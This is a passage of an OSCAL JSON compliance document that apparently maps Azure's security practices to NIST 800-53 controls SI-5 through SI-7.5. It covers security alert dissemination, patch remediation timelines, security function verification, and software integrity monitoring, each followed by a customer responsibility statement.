necessary.","provided-uuid":"ff3726dc-64e1-426e-afa4-814aebdf2d47"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"80025d31-d148-4a68-aa6c-604b52db9bca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-044"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-5_smt.c","by-components":[{"uuid":"d709bf10-3516-47e4-abc6-0413206f5e19","export":{"provided":[{"uuid":"3051a11b-3f25-4764-95b7-33066dd3c14f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-044"}],"description":"Azure disseminates alerts received from vendors and other third-party services such as IBM Internet Security Systems and US-CERT and shares this information throughout the organization. Additionally, Microsoft publishes bulletins through the Microsoft Security Response Center (MSRC) which include specific information relevant to security updates being released. The Azure Security team also addresses notifications and disseminates security alerts via email and RSS feeds received directly from external organizations other than the Services Operation Center or Microsoft Support._x000D_ _x000D_ Servers_x000D_ _x000D_ The Vulnerability Management team conducts a monthly conference call with Azure stakeholders to review updates that are required in the environment, based on the data provided in the Advance Notification Service by the MSRC. Minutes from this call are recorded and saved for historical understanding of the rationale used to determine which updates were required in the past._x000D_ _x000D_ Network Devices_x000D_ _x000D_ For network devices, hardware vendors make Azure Networking aware of security vulnerabilities on their products via e-mail. Azure Networking logs the email into the ticketing system and performs analysis to evaluate possible risks and mitigations. Azure Networking has dedicated support engineers from the major hardware vendors, including, but not limited to, Cisco, Juniper, and F5, that assist with the analysis and determination of the course of action. The issue is tracked by Azure Networking to completion._x000D_ _x000D_"}],"responsibilities":[{"uuid":"46a2ab81-f61e-4b1d-b860-37a0801c2824","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-044"}],"description":"The customer is responsible for disseminating security alerts, advisories, and directives to: customer-defined personnel/roles, organizational elements, and/or external organizations.","provided-uuid":"3051a11b-3f25-4764-95b7-33066dd3c14f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"38f40672-e65a-456e-95b4-d6d0fb075dc1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-045"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-5_smt.d","by-components":[{"uuid":"2521666e-9306-42fc-9424-345c28e10358","export":{"provided":[{"uuid":"e302f163-f34a-4252-b0d9-83c6307a24fe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-045"}],"description":"Azure conducts an analysis on the list of security directives provided by the C+AI Security team to confirm applicability to Azure assets. On completion of the analysis, the Azure service teams prepare the Final Monthly Patch List specifying the vulnerabilities that must be patched. Security remediation are implemented as follows:_x000D_ _x000D_ * Remediation for High risk vulnerabilities are implemented within thirty (30) days of the vulnerability mitigation being released by the vendor._x000D_ * Remediation for Medium Risk vulnerabilities are implemented within ninety (90) days of vulnerability the vulnerability mitigation being released by the vendor._x000D_ * Low Risk vulnerabilities are risk-reviewed by Azure Security. Many Low Risk scan results are determined by Azure Security to pose no risk to Azure. In this case an exception is filed, and the result is not remediated. If the result is determined to pose any risk to Azure, remediation is implemented within one hundred and eighty (180) days._x000D_ _x000D_ Azure Security verifies degree of compliance using vulnerability scanners deployed in Azure._x000D_ _x000D_ Servers_x000D_ _x000D_ On receipt of the list of updates from MSRC, the RDOS and IPAK teams conduct an analysis to determine the applicability of the patches for managed OS with the intent that all patches excepting those that are specifically not applicable to the code running on their servers are applied. If the RDOS and IPAK teams decide not to apply a patch as it is not applicable for the base images used in the environment, then the RDOS and IPAK teams create a patch exception request ticket in DevOps. This request is then reviewed and approved by the Azure Security team. A justification for not selecting the patches including the details of the non-applicable patches is documented in DevOps. The patch is deemed applicable even if a process that could exploit the vulnerability is not running but is installed in the environment._x000D_ _x000D_ Network Devices_x000D_ _x000D_ For network devices, hardware vendors make Azure Networking aware of security vulnerabilities on their products via e-mail. Azure Networking logs the email into the ticketing system and performs analysis to evaluate possible risks and mitigations. Azure Networking has dedicated support engineers from the major hardware vendors, including, but not limited to, Cisco, Juniper, and F5, that assist with the analysis and determination of the course of action. The issue is tracked by Azure Networking to completion._x000D_ _x000D_"}],"responsibilities":[{"uuid":"25d56d73-eb93-4e26-bf72-83f7c5aac445","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-045"}],"description":"The customer is responsible for implementing security directives in accordance with established time frames, or notifying the issuing organization of the degree of noncompliance.","provided-uuid":"e302f163-f34a-4252-b0d9-83c6307a24fe"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"41e37517-276c-4a72-987a-c1e40633ebb6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-5.1","statements":[{"uuid":"38fb0a12-6997-45b5-abca-f7f032c77fee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-046"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-5.1_smt","by-components":[{"uuid":"2b2af8e5-fcf7-49a0-90f7-2925061db494","export":{"provided":[{"uuid":"ffa91cb0-169a-415e-a3fc-1aa94ee969e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-046"}],"description":"Microsoft publishes bulletins that include specific information relevant to security updates being released. Microsoft security bulletins are available to all personnel and can be found at the link below._x000D_ _x000D_ <https://www.microsoft.com/en-us/msrc/technical-security-notifications>_x000D_ _x000D_ Personnel can subscribe to this notification service. In addition, Microsoft utilizes automated tools and mechanisms such as Kusto, Jarvis, Service 360 (S360), and Incident Management (IcM) to follow up on alert-related communications for service teams._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5944aa0c-da01-4015-8e68-be72d9b3d507","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-046"}],"description":"The customer is responsible for using automated mechanisms to make security alert and advisory information available throughout the organization.","provided-uuid":"ffa91cb0-169a-415e-a3fc-1aa94ee969e3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"3acb7e3f-3c46-4915-baae-d844239d0845","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-6","statements":[{"uuid":"ef891b3c-4a23-4715-8c79-4d5c41c670c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-047"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-6_smt.a","by-components":[{"uuid":"f827a85c-c17f-4a91-ab16-ac04ef9b2a97","export":{"provided":[{"uuid":"381f4fa0-ace9-45a0-b4b7-1420ef9243c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-047"}],"description":"Servers Azure performs near-real-time auditing and periodic verification of the following security functions to confirm their operating effectiveness. Azure uses applications called Geneva Monitoring Runners to monitor the collected data and report on the overall health of the system. If the overall health of system is deemed inappropriate for the environment by the system, the Fabric Controller (FC) is notified, and the unhealthy system is shut down and a new healthy system is brought up and running. If Azure DevOps or Incident Management (IcM) tickets are created for any security events including but not limited to alerts, advisories, and anomalies, and health status, the Windows Azure LiveSite (WALS) team actively works issues until resolution. The WALS team is staffed twenty-four (24) hours a day, seven (7) days a week. Azure uses the logging and monitoring pipeline and event audit policies to capture security functions and perform alerting in near-real time. Azure sends automated alerts to the Security Response Team in the event of anomalies being discovered for triage, investigation, and remediation, and also alerts upon system startup and/or restart and continuously provides event monitoring and alerting to the Security Response Team. Network Devices Azure uses Config Policy Verifier (CPV) and Config Change Reporter (CCR) to verify correct operation of security functions of network devices on a continuous basis. CPV and CCR automatically send alerts to the network device monitoring tool alarm console regarding deviations of correct operations of security functions. The tools alert upon system startup and/or restart and continuously provide event monitoring and alerting to the Microsoft Operations Center (MOC). The consoles reside with the MOC, which provides analysis and routing to the Azure Networking team for remediation. CPV and CCR backs up the configuration of network devices, allowing the Azure Networking team to know who made what changes to the system. This captures all changes to the device configuration including any related to security functions and deviations from baselines."}],"responsibilities":[{"uuid":"e74ae79b-d5bd-44af-bc28-29711b3542a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-047"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for security and privacy function verification for customer-deployed resources.","provided-uuid":"381f4fa0-ace9-45a0-b4b7-1420ef9243c2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"15459bac-ce27-4352-b483-b3ce44c40f12","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-048"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-6_smt.b","by-components":[{"uuid":"12a16237-629d-472d-a0b5-a3680445a59f","export":{"provided":[{"uuid":"8e63c624-a045-45c0-9020-4cefb70125da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-048"}],"description":"The audit logging and monitoring pipeline alerts upon system startup and/or restart and continuously provide event monitoring and alerting to the Security Response Team and Microsoft Operations Center (MOC)."}],"responsibilities":[{"uuid":"7ee34226-ad8d-4fcc-a777-a4e6370ce5ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-048"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for security and privacy function verification for customer-deployed resources at customer-defined system transitional states (e.g., startup, restart, shutdown, abort), upon command by a user with appropriate privilege, and/or at a customer-defined frequency.","provided-uuid":"8e63c624-a045-45c0-9020-4cefb70125da"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"54da78dd-0716-4adc-9175-ab59c2919bc7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-049"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-6_smt.c","by-components":[{"uuid":"20118ecf-e824-4f77-b049-6356fd709949","export":{"provided":[{"uuid":"3bc93c45-c046-4430-bf7b-a50be0d177e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-049"}],"description":"The audit logging and monitoring pipeline alerts upon system startup and/or restart and continuously provide event monitoring and alerting to the Security Response Team and Microsoft Operations Center (MOC)."}],"responsibilities":[{"uuid":"4e571cf5-8e7b-49b5-86b7-86834f9f32d5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-049"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for security function verification for customer-deployed resources and notifying customer-defined personnel/roles of failed security and privacy verification tests.","provided-uuid":"3bc93c45-c046-4430-bf7b-a50be0d177e9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e26e977f-4953-4305-8f9c-131d30c22b52","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-050"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-6_smt.d","by-components":[{"uuid":"633f953f-98cb-41a4-aecd-703e1db1a352","export":{"provided":[{"uuid":"b5104f18-84d4-4bb9-98b9-ae164a01c769","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-050"}],"description":"The monitoring tools identified above generate alerts to service team personnel in the case of security functionality failure. Depending on the type of issue, Azure DevOps or IcM tickets are opened to track resolution of the alert following the incident management process."}],"responsibilities":[{"uuid":"084ff588-a1f5-4240-8520-056dadfc0564","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-050"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for security function verification for customer-deployed resources and whether shutdown, restart, and/or an alternative customer-defined action is taken when anomalies are discovered.","provided-uuid":"b5104f18-84d4-4bb9-98b9-ae164a01c769"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bb8819cc-beaf-409d-83fb-1fc9a2100fed","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-7","statements":[{"uuid":"106183f4-06fd-49f3-a693-c9c4bdefb8f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-051"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-7_smt.a","by-components":[{"uuid":"970a407a-8567-491a-9d92-23e42ad14bcb","export":{"provided":[{"uuid":"41e795e5-7a65-4bb2-9e8c-eeae1cc55398","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-051"}],"description":"Servers: Azure software updates are thoroughly reviewed for any unauthorized changes before entering the production environments as part of the Security Development Lifecycle (SDL) and Change and Release Management processes. Any code changes are reviewed and approved before they are deployed to the Azure production environment. Additionally, builds are digitally signed before they are deployed. If this integrity verification fails at deployment, the deployment operation fails, and the process needs to be started over. Azure components have a set of runners which leverage information captured by Geneva Monitoring to run automated tests for checking the health of the components. Runners automatically generate alerts if any component health discrepancies are identified. This ensures recently deployed software should be propagated to more assets or rolled back as health indicators dictate. Azure also utilizes Qualys and Azure Security Monitoring (ASM) for integrity scanning to reduce the risk of software components and devices potentially being tampered within the Azure environment. ASM has components that observe, analyze, and report on security events in Azure environment. It complements the Azure security model by examining constraints that should always remain valid, which includes configuration settings. The Windows operating systems provide real-time file integrity validation, protection, and recovery of core system files that are installed as part of Windows or authorized Windows system updates. Windows Resource Protection (WRP) automatically detects and restores the original version of protected files if a program uses an unauthorized method to change those files. WRP provides protection for system files using two mechanisms. The first mechanism runs in the background. This protection is triggered after WRP receives a directory change notification for a file in a protected directory. After WRP receives this notification, WRP determines which file was changed. If the file is protected, WRP looks up the file signature in a catalog file to determine if the new file is the correct version. If the file is not the correct version, WRP replaces the new file with the file from the system protected cache folder (if it is in the cache folder) or from the installation source. In addition to WRP, on demand validation and recovery of core Windows system files are provided using the System File Checker (sfc.exe) tool. File Integrity Monitoring (FIM) consists of two elements: system file protection provided by WRP for server baselines, which is built into the operating system; and critical file monitoring provided by a combination of Local Security Policy settings for Windows Audit Object Access together with the appropriate system access control list applied to the files designated as application-critical. WRP is a real-time solution that performs scanning on a continuous basis. Azure detects changes made to the environment through the Service Fabric and configuration platform, and custom service Monitoring Agents. Changes are detected in real time and the service provisioning and configuration platform performs predefined steps to compare integrity of operating software against released production software versions and reimage the Guest OS with appropriate software files or shut down/restart the Guest OS. If the issue is not resolved by these means, then the system is reimaged, or an alert is generated to the service team. Network Devices Azure uses Config Policy Verifier (CPV) and Config Change Reporter (CCR) to notify the Azure Networking team on unauthorized changes to network devices on a continuous basis. CPV and CCR automatically send alerts to the network device monitoring tool alarm console regarding deviations of correct operations of security functions. CPV and CCR send alerts upon system startup and/or restart and continuously provide event monitoring and alerting to the Microsoft Operations Center (MOC). The network device monitoring tool consoles reside with the MOC, which provides analysis and routing to the Azure Networking team for remediation. CPV and CCR back up the configuration of network devices, allowing the Azure Networking team to know who made what changes to the system. This captures all changes to the device configuration including who made what changes when. CPV and CCR are real-time solutions that performs scanning on a continuous basis. Azure Services In addition to the Azure standard tooling and processes, service teams may use SCOM to monitor Windows operating systems. SCOM provides file integrity validation and protection, as well as the recovery of core system files if any unauthorized changes are detected."}],"responsibilities":[{"uuid":"d4d1dd2f-93a2-4c77-8186-e8a2b4647c88","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-051"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting software and information integrity for customer-deployed resources.","provided-uuid":"41e795e5-7a65-4bb2-9e8c-eeae1cc55398"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3259d895-fe97-4c22-b826-91785647ae54","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-052"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-7_smt.b","by-components":[{"uuid":"cd029fd2-19c6-44d1-a10b-227424813d4f","export":{"provided":[{"uuid":"aae58f11-dc52-44db-963d-1f0e6dfe5448","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-052"}],"description":"Servers: Azure software updates are thoroughly reviewed for any unauthorized changes before entering the production environments as part of the Security Development Lifecycle (SDL) and Change and Release Management processes. Any code changes are reviewed and approved before they are deployed to the Azure production environment. Additionally, builds are digitally signed before they are deployed. If this integrity verification fails at deployment, the deployment operation fails, and the process needs to be started over. Azure components have a set of runners which leverage information captured by Geneva Monitoring to run automated tests for checking the health of the components. Runners automatically generate alerts if any component health discrepancies are identified. This ensures recently deployed software should be propagated to more assets or rolled back as health indicators dictate. Azure also utilizes Qualys and Azure Security Monitoring (ASM) for integrity scanning to reduce the risk of software components and devices potentially being tampered within the Azure environment. ASM has components that observe, analyze, and report on security events in Azure environment. It complements the Azure security model by examining constraints that should always remain valid, which includes configuration settings. The Windows operating systems provide real-time file integrity validation, protection, and recovery of core system files that are installed as part of Windows or authorized Windows system updates. Windows Resource Protection (WRP) automatically detects and restores the original version of protected files if a program uses an unauthorized method to change those files. WRP provides protection for system files using two mechanisms. The first mechanism runs in the background. This protection is triggered after WRP receives a directory change notification for a file in a protected directory. After WRP receives this notification, WRP determines which file was changed. If the file is protected, WRP looks up the file signature in a catalog file to determine if the new file is the correct version. If the file is not the correct version, WRP replaces the new file with the file from the system protected cache folder (if it is in the cache folder) or from the installation source. In addition to WRP, on demand validation and recovery of core Windows system files are provided using the System File Checker (sfc.exe) tool. File Integrity Monitoring (FIM) consists of two elements: system file protection provided by WRP for server baselines, which is built into the operating system; and critical file monitoring provided by a combination of Local Security Policy settings for Windows Audit Object Access together with the appropriate system access control list applied to the files designated as application-critical. WRP is a real-time solution that performs scanning on a continuous basis. Azure detects changes made to the environment through the Service Fabric and configuration platform, and custom service Monitoring Agents. Changes are detected in real time and the service provisioning and configuration platform performs predefined steps to compare integrity of operating software against released production software versions and reimage the Guest OS with appropriate software files or shut down/restart the Guest OS. If the issue is not resolved by these means, then the system is reimaged, or an alert is generated to the service team. Network Devices Azure uses Config Policy Verifier (CPV) and Config Change Reporter (CCR) to notify the Azure Networking team on unauthorized changes to network devices on a continuous basis. CPV and CCR automatically send alerts to the network device monitoring tool alarm console regarding deviations of correct operations of security functions. CPV and CCR send alerts upon system startup and/or restart and continuously provide event monitoring and alerting to the Microsoft Operations Center (MOC). The network device monitoring tool consoles reside with the MOC, which provides analysis and routing to the Azure Networking team for remediation. CPV and CCR back up the configuration of network devices, allowing the Azure Networking team to know who made what changes to the system. This captures all changes to the device configuration including who made what changes when. CPV and CCR are real-time solutions that performs scanning on a continuous basis. Azure Services In addition to the Azure standard tooling and processes, service teams may use SCOM to monitor Windows operating systems. SCOM provides file integrity validation and protection, as well as the recovery of core system files if any unauthorized changes are detected."}],"responsibilities":[{"uuid":"a156f431-5552-475d-b05d-be5779673cb4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-052"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for taking action when unauthorized changes to the customer-deployed resources are detected.","provided-uuid":"aae58f11-dc52-44db-963d-1f0e6dfe5448"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6d6f161a-c2cb-40e9-a0b4-248144ba8592","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-7.1","statements":[{"uuid":"e018c5c3-7497-4299-8e1a-e9ded18962be","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-053"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-7.1_smt","by-components":[{"uuid":"223c8be8-5279-4d34-b5c3-5a9f94e90615","export":{"provided":[{"uuid":"77822685-0aba-4fd0-9b01-c12add29c2be","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-053"}],"description":"Azure software updates are reviewed for any unauthorized changes before entering the production environment as part of the Security Development Lifecycle (SDL) and Change and Release Management processes. Azure components have a set of runners which leverage information captured by Geneva Monitoring to run automated tests for checking the health of the components. Runners are configured to automatically generate alerts if any component health discrepancies are identified._x000D_ _x000D_ Azure also utilizes Azure Security Monitoring (ASM) for integrity scanning to reduce the risk of software components and devices potentially being tampered within the Azure environment. ASM has components that observe, analyze and report on security events continually in Azure environment. It complements the Azure security model by examining constraints that should always remain valid, which includes configuration settings._x000D_ _x000D_ Azure reassesses the integrity of software and information by monitoring of events reported via Windows Resource Protection (WRP) and File Integrity Monitoring (FIM). Network devices are monitored via Config Policy Verifier (CPV) and Config Change Reporter (CCR) in near-real time. WRP, FIM, CPV, and CCR are continuously scanning the environment for changes in near-real time that would constitute a change in the integrity of software in the system._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f39133ec-5ff3-4bca-99c4-05c898455845","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-053"}],"description":"The customer is responsible for protecting software and information integrity for customer-deployed resources, including performing integrity checks of customer-defined software and information at customer-defined system transitional states (e.g., startup, restart, shutdown, abort), in response to customer-defined security-related events or at a customer-defined frequency.","provided-uuid":"77822685-0aba-4fd0-9b01-c12add29c2be"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"fa3dd8d7-e858-411f-8a64-f63cf31f4412","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-7.2","statements":[{"uuid":"f3fab400-e939-40de-a30f-06e5a15a9bb9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-054"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-7.2_smt","by-components":[{"uuid":"119452fe-a45f-45d1-b6ff-099c7b5d0f6c","export":{"provided":[{"uuid":"3a08e7bc-af1d-43af-a255-908d02caf7fe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-054"}],"description":"Azure software updates are thoroughly reviewed for any unauthorized changes before entering the production environments as part of the Security Development Lifecycle (SDL) and Change and Release Management processes. Any code changes must be reviewed and approved before they are deployed to the environment. Additionally, builds are digitally signed before they are deployed. If the integrity verification fails at deployment, the deployment operation fails, and the process needs to be started over. The deployment engine is configured to notify service teams upon discovery of discrepancies during integrity verification. Service teams are notified via email or the creation of DevOps tickets._x000D_ _x000D_ The Windows Server operating systems provide real-time file integrity validation, protection, and recovery of core system files that are installed as part of Windows or authorized Windows system updates. Windows Resource Protection (WRP) automatically detects and restores the original version of protected files if a program uses an unauthorized method to change those files._x000D_ _x000D_ WRP provides protection for system files using two mechanisms. The first mechanism runs in the background. This protection is triggered after WRP receives a directory change notification for a file in a protected directory. After WRP receives this notification, WRP determines which file was changed. If the file is protected, WRP looks up the file signature in a catalog file to determine if the new file is the correct version. If the file is not the correct version, WRP replaces the new file with the file from the system protected cache folder (if it is in the cache folder) or from the installation source. In addition to WRP, on demand validation and recovery of core Windows system files are provided using the System File Checker (sfc.exe) tool._x000D_ _x000D_ The Security File Integrity Monitoring (FIM) component consists of 2 elements:_x000D_ _x000D_ * System files protection provided by Windows Resource Protection (WRP) for Server baseline(s). This functionality is built into the operating system._x000D_ * Critical file monitoring over and above that offered by WRP is provided by a combination of Local Security Policy settings for Windows Audit Object Access (WOA) together with the appropriate system access-control list (SACL) applied to the files designated as application-critical._x000D_ _x000D_ Both technologies write events to the event logs which are forwarded by an event forwarding tool and monitored by a security incident and event management tool. WRP is a real-time solution that performs scanning on a continuous basis. Network Devices_x000D_ _x000D_ Azure uses the Config Policy Verifier (CPV) and Config Change Reporter (CCR) tools to notify the Azure Networking team on unauthorized changes to network devices on a continuous basis. CPV and CCR automatically send alerts to Incident Management (IcM) regarding deviations of correct operations of security functions. CPV and CCR alert upon system startup and restart and continuously provides event monitoring and alerting to Azure Networking. CPV and CCR are near-real-time solutions that perform scanning on a continuous basis._x000D_ _x000D_"}],"responsibilities":[{"uuid":"01d2c304-a7eb-4176-ad3a-2ccc30a0af9d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-054"}],"description":"The customer is responsible for protecting software and information integrity for customer-deployed resources by employing automated tools that provide notification to customer-defined personnel/roles upon discovering discrepancies during integrity verification.","provided-uuid":"3a08e7bc-af1d-43af-a255-908d02caf7fe"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"59e74b93-fa99-4e1a-91fb-1edc8e1d1fa2","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-7.5","statements":[{"uuid":"bf982818-f9ef-40d7-8b7e-6532e161e932","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-055"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-7.5_smt","by-components":[{"uuid":"915ace6b-bebb-42f3-8635-b05f4f6b3776","export":{"provided":[{"uuid":"ae8e9fcf-2f7d-4742-b5aa-1be087a4c045","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-055"}],"description":"Azure provides alerts for integrity violations to the Security Response Team to use in case of suspected incidents. Shutting down the system would potentially cause operational issues including outages as a response to an integrity violation and expose the system to availability or denial of service risks. The Security Response Team investigates any instances of integrity violation that is suspected of being a security incident and respond according to their operating procedures._x000D_ _x000D_ Azure software updates are thoroughly reviewed for any unauthorized changes before entering the production environments as part of the Security Development Lifecycle (SDL) and Change and Release Management processes. Any code changes must be reviewed and approved before they are deployed to the environment. Additionally, builds are digitally signed before they are deployed. If the integrity verification fails at deployment, the deployment operation fails, and the process needs to be started over. The deployment engine is configured to 